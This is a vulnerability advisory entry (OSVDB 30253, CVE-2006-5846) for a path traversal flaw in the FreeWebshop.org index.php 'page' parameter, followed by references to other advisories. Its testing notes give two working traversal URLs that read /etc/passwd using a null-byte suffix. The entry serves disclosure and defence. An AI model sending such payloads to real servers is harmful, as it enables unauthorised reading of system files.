FreeWebshop.org Script index.php page Variable Traversal Arbitrary File Access

2006-11-08T09:48:47
ID OSVDB:30253
Type osvdb
Reporter OSVDB
Modified 2006-11-08T09:48:47

Description

Manual Testing Notes

http://[target]/?page=../../../../../../../../../../etc/passwd%00 http://[target]/index.php?page=../../../../../../../../../../etc/passwd%00

References:

Vendor Specific News/Changelog Entry: http://www.freewebshop.org/?id=28 Security Tracker: 1017200 Secunia Advisory ID:22786 Related OSVDB ID: 30254 Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-11/0137.html ISS X-Force ID: 30125 FrSIRT Advisory: ADV-2006-4420 CVE-2006-5846 Bugtraq ID: 20969